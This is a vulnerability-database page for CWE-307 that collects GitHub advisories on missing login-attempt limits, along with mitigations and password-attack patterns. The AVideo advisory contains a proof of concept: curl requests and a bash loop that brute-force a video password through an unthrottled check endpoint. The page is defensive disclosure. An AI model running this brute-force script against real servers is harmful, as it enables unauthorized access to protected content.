CWE-307
AllowedImproper Restriction of Excessive Authentication Attempts
Abstraction: Base · Status: Draft
The product does not implement sufficient measures to prevent multiple failed authentication attempts within a short time frame.
905 vulnerabilities reference this CWE, most recent first.
GHSA-8PRQ-2JR2-CM92
Vulnerability from github – Published: 2026-03-26 18:07 – Updated: 2026-03-27 21:38Summary
The get_api_video_password_is_correct API endpoint allows any unauthenticated user to verify whether a given password is correct for any password-protected video. The endpoint returns a boolean passwordIsCorrect field with no rate limiting, CAPTCHA, or authentication requirement, enabling efficient offline-speed brute-force attacks against video passwords.
Details
The vulnerable endpoint is defined at plugin/API/API.php:1111-1133:
public function get_api_video_password_is_correct($parameters)
{
$obj = new stdClass();
$obj->videos_id = intval($parameters['videos_id']);
$obj->passwordIsCorrect = true;
$error = true;
$msg = '';
if (!empty($obj->videos_id)) {
$error = false;
$video = new Video('', '', $obj->videos_id);
$password = $video->getVideo_password();
if (!empty($password)) {
$obj->passwordIsCorrect = $password == $parameters['video_password'];
}
} else {
$msg = 'Videos id is required';
}
return new ApiObject($msg, $error, $obj);
}
The get() dispatcher at API.php:191-209 routes GET requests directly to this method without any authentication enforcement:
public function get($parameters) {
// ... optional user login if credentials provided ...
$APIName = $parameters['APIName'];
if (method_exists($this, "get_api_$APIName")) {
$str = "\$object = \$this->get_api_$APIName(\$parameters);";
eval($str);
}
}
The application has a checkRateLimit() mechanism (line 5737) that is applied to user registration (line 4232) and user deactivation (line 5705), but is not applied to this password verification endpoint.
Additionally, video passwords are stored in plaintext (objects/video.php:523-527):
public function setVideo_password($video_password) {
AVideoPlugin::onVideoSetVideo_password($this->id, $this->video_password, $video_password);
$this->video_password = trim($video_password);
}
The comparison at line 1125 uses loose equality (==) rather than strict equality (===).
PoC
Step 1: Identify a password-protected video
curl -s "http://localhost/plugin/API/get.json.php?APIName=video&videos_id=1" | jq '.response.rows[0].video_password'
A non-empty value (e.g., "1") indicates the video is password-protected.
Step 2: Test incorrect password (oracle returns false)
curl -s "http://localhost/plugin/API/get.json.php?APIName=video_password_is_correct&videos_id=1&video_password=wrongguess"
Expected response:
{"response":{"videos_id":1,"passwordIsCorrect":false},"error":false}
Step 3: Brute-force the password
for pw in password 123456 secret admin test video1 qwerty; do
result=$(curl -s "http://localhost/plugin/API/get.json.php?APIName=video_password_is_correct&videos_id=1&video_password=$pw" | jq -r '.response.passwordIsCorrect')
echo "$pw: $result"
[ "$result" = "true" ] && echo "FOUND: $pw" && break
done
No rate limiting is encountered regardless of request volume.
Step 4: Unlock the video with the discovered password
curl -s "http://localhost/view/video.php?v=1&video_password=DISCOVERED_PASSWORD" -c cookies.txt
The password is stored in the session (CustomizeUser.php:806-807) granting persistent access.
Impact
An attacker can brute-force the password of any password-protected video on the platform without authentication. Since video passwords are typically simple shared secrets (not per-user credentials), common password dictionaries are likely to succeed quickly. Successful exploitation bypasses the access control for password-protected content, which may include commercially sensitive, private, or restricted video content. The lack of any rate limiting means an attacker can test thousands of passwords per second.
Recommended Fix
- Add rate limiting to the endpoint using the existing
checkRateLimit()mechanism:
public function get_api_video_password_is_correct($parameters)
{
$this->checkRateLimit('video_password_check', 5, 300); // 5 attempts per 5 minutes per IP
$obj = new stdClass();
$obj->videos_id = intval($parameters['videos_id']);
// ... rest of existing code
}
- Hash video passwords using
password_hash()/password_verify()instead of plaintext storage and loose comparison:
// In setVideo_password:
$this->video_password = password_hash(trim($video_password), PASSWORD_DEFAULT);
// In the check endpoint:
$obj->passwordIsCorrect = password_verify($parameters['video_password'], $password);
- Use strict comparison (
===) if plaintext passwords must be retained temporarily during migration.
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "wwbn/avideo"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "26.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-33763"
],
"database_specific": {
"cwe_ids": [
"CWE-307"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-26T18:07:38Z",
"nvd_published_at": "2026-03-27T15:16:58Z",
"severity": "MODERATE"
},
"details": "## Summary\n\nThe `get_api_video_password_is_correct` API endpoint allows any unauthenticated user to verify whether a given password is correct for any password-protected video. The endpoint returns a boolean `passwordIsCorrect` field with no rate limiting, CAPTCHA, or authentication requirement, enabling efficient offline-speed brute-force attacks against video passwords.\n\n## Details\n\nThe vulnerable endpoint is defined at `plugin/API/API.php:1111-1133`:\n\n```php\npublic function get_api_video_password_is_correct($parameters)\n{\n $obj = new stdClass();\n $obj-\u003evideos_id = intval($parameters[\u0027videos_id\u0027]);\n $obj-\u003epasswordIsCorrect = true;\n $error = true;\n $msg = \u0027\u0027;\n\n if (!empty($obj-\u003evideos_id)) {\n $error = false;\n $video = new Video(\u0027\u0027, \u0027\u0027, $obj-\u003evideos_id);\n $password = $video-\u003egetVideo_password();\n if (!empty($password)) {\n $obj-\u003epasswordIsCorrect = $password == $parameters[\u0027video_password\u0027];\n }\n } else {\n $msg = \u0027Videos id is required\u0027;\n }\n\n return new ApiObject($msg, $error, $obj);\n}\n```\n\nThe `get()` dispatcher at `API.php:191-209` routes GET requests directly to this method without any authentication enforcement:\n\n```php\npublic function get($parameters) {\n // ... optional user login if credentials provided ...\n $APIName = $parameters[\u0027APIName\u0027];\n if (method_exists($this, \"get_api_$APIName\")) {\n $str = \"\\$object = \\$this-\u003eget_api_$APIName(\\$parameters);\";\n eval($str);\n }\n}\n```\n\nThe application has a `checkRateLimit()` mechanism (line 5737) that is applied to user registration (line 4232) and user deactivation (line 5705), but is **not** applied to this password verification endpoint.\n\nAdditionally, video passwords are stored in plaintext (`objects/video.php:523-527`):\n\n```php\npublic function setVideo_password($video_password) {\n AVideoPlugin::onVideoSetVideo_password($this-\u003eid, $this-\u003evideo_password, $video_password);\n $this-\u003evideo_password = trim($video_password);\n}\n```\n\nThe comparison at line 1125 uses loose equality (`==`) rather than strict equality (`===`).\n\n## PoC\n\n**Step 1: Identify a password-protected video**\n\n```bash\ncurl -s \"http://localhost/plugin/API/get.json.php?APIName=video\u0026videos_id=1\" | jq \u0027.response.rows[0].video_password\u0027\n```\n\nA non-empty value (e.g., `\"1\"`) indicates the video is password-protected.\n\n**Step 2: Test incorrect password (oracle returns false)**\n\n```bash\ncurl -s \"http://localhost/plugin/API/get.json.php?APIName=video_password_is_correct\u0026videos_id=1\u0026video_password=wrongguess\"\n```\n\nExpected response:\n```json\n{\"response\":{\"videos_id\":1,\"passwordIsCorrect\":false},\"error\":false}\n```\n\n**Step 3: Brute-force the password**\n\n```bash\nfor pw in password 123456 secret admin test video1 qwerty; do\n result=$(curl -s \"http://localhost/plugin/API/get.json.php?APIName=video_password_is_correct\u0026videos_id=1\u0026video_password=$pw\" | jq -r \u0027.response.passwordIsCorrect\u0027)\n echo \"$pw: $result\"\n [ \"$result\" = \"true\" ] \u0026\u0026 echo \"FOUND: $pw\" \u0026\u0026 break\ndone\n```\n\nNo rate limiting is encountered regardless of request volume.\n\n**Step 4: Unlock the video with the discovered password**\n\n```bash\ncurl -s \"http://localhost/view/video.php?v=1\u0026video_password=DISCOVERED_PASSWORD\" -c cookies.txt\n```\n\nThe password is stored in the session (`CustomizeUser.php:806-807`) granting persistent access.\n\n## Impact\n\nAn attacker can brute-force the password of any password-protected video on the platform without authentication. Since video passwords are typically simple shared secrets (not per-user credentials), common password dictionaries are likely to succeed quickly. Successful exploitation bypasses the access control for password-protected content, which may include commercially sensitive, private, or restricted video content. The lack of any rate limiting means an attacker can test thousands of passwords per second.\n\n## Recommended Fix\n\n1. **Add rate limiting** to the endpoint using the existing `checkRateLimit()` mechanism:\n\n```php\npublic function get_api_video_password_is_correct($parameters)\n{\n $this-\u003echeckRateLimit(\u0027video_password_check\u0027, 5, 300); // 5 attempts per 5 minutes per IP\n\n $obj = new stdClass();\n $obj-\u003evideos_id = intval($parameters[\u0027videos_id\u0027]);\n // ... rest of existing code\n}\n```\n\n2. **Hash video passwords** using `password_hash()`/`password_verify()` instead of plaintext storage and loose comparison:\n\n```php\n// In setVideo_password:\n$this-\u003evideo_password = password_hash(trim($video_password), PASSWORD_DEFAULT);\n\n// In the check endpoint:\n$obj-\u003epasswordIsCorrect = password_verify($parameters[\u0027video_password\u0027], $password);\n```\n\n3. **Use strict comparison** (`===`) if plaintext passwords must be retained temporarily during migration.",
"id": "GHSA-8prq-2jr2-cm92",
"modified": "2026-03-27T21:38:24Z",
"published": "2026-03-26T18:07:38Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-8prq-2jr2-cm92"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33763"
},
{
"type": "WEB",
"url": "https://github.com/WWBN/AVideo/commit/01a0614fedcdaee47832c0d913a0fb86d8c28135"
},
{
"type": "PACKAGE",
"url": "https://github.com/WWBN/AVideo"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "AVideo has an Unauthenticated Video Password Brute-Force Vulnerability via Unrate-Limited Boolean Oracle"
}
GHSA-8PWW-55PM-85VV
Vulnerability from github – Published: 2024-08-06 18:30 – Updated: 2024-08-07 21:31GL-iNet products AR750/AR750S/AR300M/AR300M16/MT300N-V2/B1300/MT1300/SFT1200/X750 v4.3.11, MT3000/MT2500/AXT1800/AX1800/A1300/X300B v4.5.16, XE300 v4.3.16, E750 v4.3.12, AP1300/S1300 v4.3.13, and XE3000/X3000 v4.4 were discovered to contain a remote code execution (RCE) vulnerability.
{
"affected": [],
"aliases": [
"CVE-2024-39225"
],
"database_specific": {
"cwe_ids": [
"CWE-307"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-08-06T16:15:48Z",
"severity": "CRITICAL"
},
"details": "GL-iNet products AR750/AR750S/AR300M/AR300M16/MT300N-V2/B1300/MT1300/SFT1200/X750 v4.3.11, MT3000/MT2500/AXT1800/AX1800/A1300/X300B v4.5.16, XE300 v4.3.16, E750 v4.3.12, AP1300/S1300 v4.3.13, and XE3000/X3000 v4.4 were discovered to contain a remote code execution (RCE) vulnerability.",
"id": "GHSA-8pww-55pm-85vv",
"modified": "2024-08-07T21:31:44Z",
"published": "2024-08-06T18:30:56Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-39225"
},
{
"type": "WEB",
"url": "https://github.com/gl-inet/CVE-issues/blob/main/4.0.0/Bypass%20the%20login%20mechanism.md"
},
{
"type": "WEB",
"url": "http://ar750ar750sar300mar300m16mt300n-v2b1300mt1300sft1200x750.com"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-8QCV-2VPM-XFXG
Vulnerability from github – Published: 2025-07-03 12:34 – Updated: 2025-07-03 12:34The MEAC300-FNADE4 does not implement sufficient measures to prevent multiple failed authentication attempts within a short time frame, making it susceptible to brute-force attacks.
{
"affected": [],
"aliases": [
"CVE-2025-27449"
],
"database_specific": {
"cwe_ids": [
"CWE-307"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-07-03T12:15:22Z",
"severity": "HIGH"
},
"details": "The MEAC300-FNADE4 does not implement sufficient measures to prevent multiple failed authentication attempts within a short time frame, making it susceptible to brute-force attacks.",
"id": "GHSA-8qcv-2vpm-xfxg",
"modified": "2025-07-03T12:34:57Z",
"published": "2025-07-03T12:34:57Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-27449"
},
{
"type": "WEB",
"url": "https://sick.com/psirt"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/resources-tools/resources/ics-recommended-practices"
},
{
"type": "WEB",
"url": "https://www.endress.com"
},
{
"type": "WEB",
"url": "https://www.first.org/cvss/calculator/3.1"
},
{
"type": "WEB",
"url": "https://www.sick.com/.well-known/csaf/white/2025/sca-2025-0008.json"
},
{
"type": "WEB",
"url": "https://www.sick.com/.well-known/csaf/white/2025/sca-2025-0008.pdf"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-8R94-4H3C-939F
Vulnerability from github – Published: 2022-07-06 00:00 – Updated: 2022-07-15 20:44Nakama Console does not enforce any limit for the number of unsuccessful login attempts.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/heroiclabs/nakama/v3"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "3.12.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2022-2321"
],
"database_specific": {
"cwe_ids": [
"CWE-307"
],
"github_reviewed": true,
"github_reviewed_at": "2022-07-06T19:58:27Z",
"nvd_published_at": "2022-07-05T19:15:00Z",
"severity": "CRITICAL"
},
"details": "Nakama Console does not enforce any limit for the number of unsuccessful login attempts.",
"id": "GHSA-8r94-4h3c-939f",
"modified": "2022-07-15T20:44:32Z",
"published": "2022-07-06T00:00:26Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-2321"
},
{
"type": "WEB",
"url": "https://github.com/heroiclabs/nakama/pull/878"
},
{
"type": "WEB",
"url": "https://github.com/heroiclabs/nakama/commit/e2e02fce80ff33ce45f8a6ebc0b7a99ee0b03824"
},
{
"type": "PACKAGE",
"url": "https://github.com/heroiclabs/nakama"
},
{
"type": "WEB",
"url": "https://huntr.dev/bounties/3055b3f5-6b80-4d47-8e00-3500dfb458bc"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Improper Restriction of Excessive Authentication Attempts"
}
GHSA-8RF3-52XM-W6JC
Vulnerability from github – Published: 2025-02-18 21:32 – Updated: 2026-04-01 18:33Improper Restriction of Excessive Authentication Attempts vulnerability in Rameez Iqbal Real Estate Manager allows Password Brute Forcing. This issue affects Real Estate Manager: from n/a through 7.3.
{
"affected": [],
"aliases": [
"CVE-2025-22645"
],
"database_specific": {
"cwe_ids": [
"CWE-307"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-02-18T20:15:26Z",
"severity": "MODERATE"
},
"details": "Improper Restriction of Excessive Authentication Attempts vulnerability in Rameez Iqbal Real Estate Manager allows Password Brute Forcing. This issue affects Real Estate Manager: from n/a through 7.3.",
"id": "GHSA-8rf3-52xm-w6jc",
"modified": "2026-04-01T18:33:41Z",
"published": "2025-02-18T21:32:51Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-22645"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/wordpress/plugin/real-estate-manager/vulnerability/wordpress-real-estate-manager-property-listing-and-agent-management-plugin-7-3-captcha-bypass-vulnerability-vulnerability?_s_id=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-8V6M-7F5V-HHX6
Vulnerability from github – Published: 2024-05-23 19:37 – Updated: 2024-05-23 19:37Default Administrator accounts were not subject to the same brute force protection afforded to other Member accounts. Failed login counts were not logged for default admins resulting in unlimited attempts on the default admin username and password.
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "silverstripe/framework"
},
"ranges": [
{
"events": [
{
"introduced": "3.1.18"
},
{
"fixed": "3.1.19"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "silverstripe/framework"
},
"ranges": [
{
"events": [
{
"introduced": "3.2.3"
},
{
"fixed": "3.2.4"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "silverstripe/framework"
},
"ranges": [
{
"events": [
{
"introduced": "3.3.1"
},
{
"fixed": "3.3.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-307"
],
"github_reviewed": true,
"github_reviewed_at": "2024-05-23T19:37:11Z",
"nvd_published_at": null,
"severity": "CRITICAL"
},
"details": "Default Administrator accounts were not subject to the same brute force protection afforded to other Member accounts. Failed login counts were not logged for default admins resulting in unlimited attempts on the default admin username and password.",
"id": "GHSA-8v6m-7f5v-hhx6",
"modified": "2024-05-23T19:37:11Z",
"published": "2024-05-23T19:37:11Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/silverstripe/silverstripe-framework/commit/f32c893546340c8c279fd1ab6d4269e9d6539bc2"
},
{
"type": "WEB",
"url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/silverstripe/framework/SS-2016-005-1.yaml"
},
{
"type": "PACKAGE",
"url": "https://github.com/silverstripe/silverstripe-framework"
},
{
"type": "WEB",
"url": "https://www.silverstripe.org/download/security-releases/ss-2016-005"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Silverstripe Brute force bypass on default admin"
}
GHSA-8XPJ-F658-F859
Vulnerability from github – Published: 2022-05-24 17:19 – Updated: 2024-04-04 02:54Royal TS before 5 has a 0.0.0.0 listener, which makes it easier for attackers to bypass tunnel authentication via a brute-force approach.
{
"affected": [],
"aliases": [
"CVE-2020-13872"
],
"database_specific": {
"cwe_ids": [
"CWE-307"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2020-06-09T19:15:00Z",
"severity": "HIGH"
},
"details": "Royal TS before 5 has a 0.0.0.0 listener, which makes it easier for attackers to bypass tunnel authentication via a brute-force approach.",
"id": "GHSA-8xpj-f658-f859",
"modified": "2024-04-04T02:54:21Z",
"published": "2022-05-24T17:19:36Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-13872"
},
{
"type": "WEB",
"url": "https://hacktips.it/royalts-ssh-tunnel-authentication-bypass"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/158000/RoyalTS-SSH-Tunnel-Authentication-Bypass.html"
},
{
"type": "WEB",
"url": "http://seclists.org/fulldisclosure/2020/Jun/14"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-93P6-C827-87MM
Vulnerability from github – Published: 2021-12-11 00:00 – Updated: 2021-12-15 00:01Due to insufficient server-side login-attempt limit enforcement, a vulnerability in /account/login in Huntflow Enterprise before 3.10.14 could allow an unauthenticated, remote user to perform multiple login attempts for brute-force password guessing.
{
"affected": [],
"aliases": [
"CVE-2021-37934"
],
"database_specific": {
"cwe_ids": [
"CWE-307"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-12-10T17:15:00Z",
"severity": "CRITICAL"
},
"details": "Due to insufficient server-side login-attempt limit enforcement, a vulnerability in /account/login in Huntflow Enterprise before 3.10.14 could allow an unauthenticated, remote user to perform multiple login attempts for brute-force password guessing.",
"id": "GHSA-93p6-c827-87mm",
"modified": "2021-12-15T00:01:33Z",
"published": "2021-12-11T00:00:43Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-37934"
},
{
"type": "WEB",
"url": "https://gist.github.com/andrey-lomtev/4ec9004101152ea9d0043a09d59498a6"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-93V4-P5MH-4HR7
Vulnerability from github – Published: 2023-01-20 09:30 – Updated: 2023-01-26 21:30HCL BigFix Mobile / Modern Client Management Admin and Config UI passwords can be brute-forced. User should be locked out for multiple invalid attempts.
{
"affected": [],
"aliases": [
"CVE-2021-27782"
],
"database_specific": {
"cwe_ids": [
"CWE-307"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-01-20T07:15:00Z",
"severity": "HIGH"
},
"details": "HCL BigFix Mobile / Modern Client Management Admin and Config UI passwords can be brute-forced. User should be locked out for multiple invalid attempts.",
"id": "GHSA-93v4-p5mh-4hr7",
"modified": "2023-01-26T21:30:31Z",
"published": "2023-01-20T09:30:31Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-27782"
},
{
"type": "WEB",
"url": "https://support.hcltechsw.com/csm?id=kb_article\u0026sysparm_article=KB0102477"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-9445-66J5-FHVJ
Vulnerability from github – Published: 2022-05-24 17:43 – Updated: 2022-05-24 17:43The telnet administrator service running on port 650 on Gigaset DX600A v41.00-175 devices does not implement any lockout or throttling functionality. This situation (together with the weak password policy that forces a 4-digit password) allows remote attackers to easily obtain administrative access via brute-force attacks.
{
"affected": [],
"aliases": [
"CVE-2021-25309"
],
"database_specific": {
"cwe_ids": [
"CWE-269",
"CWE-307"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-03-02T01:15:00Z",
"severity": "CRITICAL"
},
"details": "The telnet administrator service running on port 650 on Gigaset DX600A v41.00-175 devices does not implement any lockout or throttling functionality. This situation (together with the weak password policy that forces a 4-digit password) allows remote attackers to easily obtain administrative access via brute-force attacks.",
"id": "GHSA-9445-66j5-fhvj",
"modified": "2022-05-24T17:43:28Z",
"published": "2022-05-24T17:43:28Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-25309"
},
{
"type": "WEB",
"url": "https://research.nccgroup.com/2021/02/28/technical-advisory-administrative-passcode-recovery-and-authenticated-remote-buffer-overflow-vulnerabilities-in-gigaset-dx600a-handset-cve-2021-25309-cve-2021-25306"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
Mitigation
- Common protection mechanisms include:
- Disconnecting the user after a small number of failed attempts
- Implementing a timeout
- Locking out a targeted account
- Requiring a computational task on the user's part.
Mitigation MIT-4
Strategy: Libraries or Frameworks
- Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482].
- Consider using libraries with authentication capabilities such as OpenSSL or the ESAPI Authenticator. [REF-45]
CAPEC-16: Dictionary-based Password Attack
An attacker tries each of the words in a dictionary as passwords to gain access to the system via some user's account. If the password chosen by the user was a word within the dictionary, this attack will be successful (in the absence of other mitigations). This is a specific instance of the password brute forcing attack pattern.
Dictionary Attacks differ from similar attacks such as Password Spraying (CAPEC-565) and Credential Stuffing (CAPEC-600), since they leverage unknown username/password combinations and don't care about inducing account lockouts.
CAPEC-49: Password Brute Forcing
An adversary tries every possible value for a password until they succeed. A brute force attack, if feasible computationally, will always be successful because it will essentially go through all possible passwords given the alphabet used (lower case letters, upper case letters, numbers, symbols, etc.) and the maximum length of the password.
CAPEC-560: Use of Known Domain Credentials
An adversary guesses or obtains (i.e. steals or purchases) legitimate credentials (e.g. userID/password) to achieve authentication and to perform authorized actions under the guise of an authenticated user or service.
CAPEC-565: Password Spraying
In a Password Spraying attack, an adversary tries a small list (e.g. 3-5) of common or expected passwords, often matching the target's complexity policy, against a known list of user accounts to gain valid credentials. The adversary tries a particular password for each user account, before moving onto the next password in the list. This approach assists the adversary in remaining undetected by avoiding rapid or frequent account lockouts. The adversary may then reattempt the process with additional passwords, once enough time has passed to prevent inducing a lockout.
CAPEC-600: Credential Stuffing
An adversary tries known username/password combinations against different systems, applications, or services to gain additional authenticated access. Credential Stuffing attacks rely upon the fact that many users leverage the same username/password combination for multiple systems, applications, and services.
CAPEC-652: Use of Known Kerberos Credentials
An adversary obtains (i.e. steals or purchases) legitimate Kerberos credentials (e.g. Kerberos service account userID/password or Kerberos Tickets) with the goal of achieving authenticated access to additional systems, applications, or services within the domain.
CAPEC-653: Use of Known Operating System Credentials
An adversary guesses or obtains (i.e. steals or purchases) legitimate operating system credentials (e.g. userID/password) to achieve authentication and to perform authorized actions on the system, under the guise of an authenticated user or service. This applies to any Operating System.